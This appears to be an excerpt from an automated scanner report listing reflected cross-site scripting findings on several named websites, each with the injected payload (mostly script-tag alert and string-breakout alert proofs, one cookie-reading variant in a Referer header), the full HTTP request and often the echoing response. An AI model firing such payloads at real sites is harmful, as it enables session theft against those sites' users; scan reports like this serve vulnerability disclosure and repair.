The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8c40"><script>alert(1)</script>23d9018f7a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/A-Lista8c40"><script>alert(1)</script>23d9018f7a3 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f0c8"-alert(1)-"39e9638a1ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/A-List7f0c8"-alert(1)-"39e9638a1ff HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be04'><script>alert(1)</script>43f8c6292e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/AT9be04'><script>alert(1)</script>43f8c6292e2 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30613"-alert(1)-"94f0bdba78e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/AT30613"-alert(1)-"94f0bdba78e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d1"><script>alert(1)</script>966a5ade193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/AT259d1"><script>alert(1)</script>966a5ade193 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cdff'><script>alert(1)</script>7fc59e7282f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d2"><script>alert(1)</script>0f550289d8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f862"-alert(1)-"b0c5dfc94b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86263'><script>alert(1)</script>484a3c8edc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26605"-alert(1)-"689bed10a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/Miss-Download26605"-alert(1)-"689bed10a7d HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddabd"><script>alert(1)</script>d590b6c1636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b6d'><script>alert(1)</script>031da9bdfb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49459"><script>alert(1)</script>6537b84f503 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfea8"-alert(1)-"554ac61bd4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe3'><script>alert(1)</script>2aec528306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2be"><script>alert(1)</script>0cc37f18b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab27"-alert(1)-"9bc82b719cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/On-Deck7ab27"-alert(1)-"9bc82b719cd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3d86'><script>alert(1)</script>b1ffded8566 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756bb"-alert(1)-"c84622db6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shows/The-Noob756bb"-alert(1)-"c84622db6bd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a634"><script>alert(1)</script>ec3897212c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]... <input type=hidden name=ref value="http://www.butterscotch.com/shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8" /> ...[SNIP]...
3.107. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.butterscotch.com
Path:
/tutorials.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7c85'><script>alert(1)</script>bc9e9d0f84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]... <input type='hidden' name='ref' value='/tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1' /> ...[SNIP]...
3.108. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.butterscotch.com
Path:
/tutorials.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73a3"-alert(1)-"3ae1549e395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tutorials.html?c73a3"-alert(1)-"3ae1549e395=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59ab9</title><script>alert(1)</script>4e54375ce26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 610a7<script>alert(1)</script>e398f29f414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /reviews/610a7<script>alert(1)</script>e398f29f414/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c455e'%3balert(1)//fdc072ec141 was submitted in the REST URL parameter 2. This input was echoed as c455e';alert(1)//fdc072ec141 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/c455e'%3balert(1)//fdc072ec141/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44a08'%3b28a34fbd60c was submitted in the REST URL parameter 2. This input was echoed as 44a08';28a34fbd60c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whois/smartdevil.com44a08'%3b28a34fbd60c/x22 HTTP/1.1
Host: www.ip-adress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:56:51 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Set-Cookie: isv=1; expires=Fri, 04-Feb-2011 21:56:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13811
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... <span id="hostname">smartdevil.com44a08';28a34fbd60c </' + 'span> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4473"%20a%3db%2016a87f4d9f1 was submitted in the REST URL parameter 2. This input was echoed as c4473" a=b 16a87f4d9f1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /find-jobs/All-Locationc4473"%20a%3db%2016a87f4d9f1/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=2d455231d6b3a9382ff7357e54908a71; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:46 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <meta name="description" content="Find warehouse openings in westland michigan.html jobs and career in All Locationc4473" a=b 16a87f4d9f1, displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e162b"%3b450ee9e1714 was submitted in the REST URL parameter 2. This input was echoed as e162b";450ee9e1714 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /find-jobs/All-Locatione162b"%3b450ee9e1714/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=a7d5c6bff03ec5fc507b206bd2f58b86; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:48 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 636d6"%20a%3db%201c410831e56 was submitted in the REST URL parameter 3. This input was echoed as 636d6" a=b 1c410831e56 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html636d6"%20a%3db%201c410831e56/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=60ddc87c66256906fadd1f2a484abc98; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:04 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25218
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <meta name="description" content="Find warehouse openings in westland michigan.html636d6" a=b 1c410831e56 jobs and career , displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11311"%3bb0138398545 was submitted in the REST URL parameter 3. This input was echoed as 11311";b0138398545 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html11311"%3bb0138398545/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=7377341cb25663e7e8ec2eb65cf84816; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:06 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73100<script>alert(1)</script>af671aace11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bsdlicense.txt73100<script>alert(1)</script>af671aace11 HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:00:42 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=88d2jmcinjb18m98s7vavegus2; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:00:41 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8327
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d399a<script>alert(1)</script>179d88325a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /d399a<script>alert(1)</script>179d88325a3 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76
Response
HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:03 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:02 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee332<script>alert(1)</script>0b6fe74c897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ee332<script>alert(1)</script>0b6fe74c897 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76
Response
HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:18 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:17 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html dir="ltr" lang="pl-PL">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28728<script>alert(1)</script>812ffa424ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lab/yetii28728<script>alert(1)</script>812ffa424ab/ HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:02:24 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
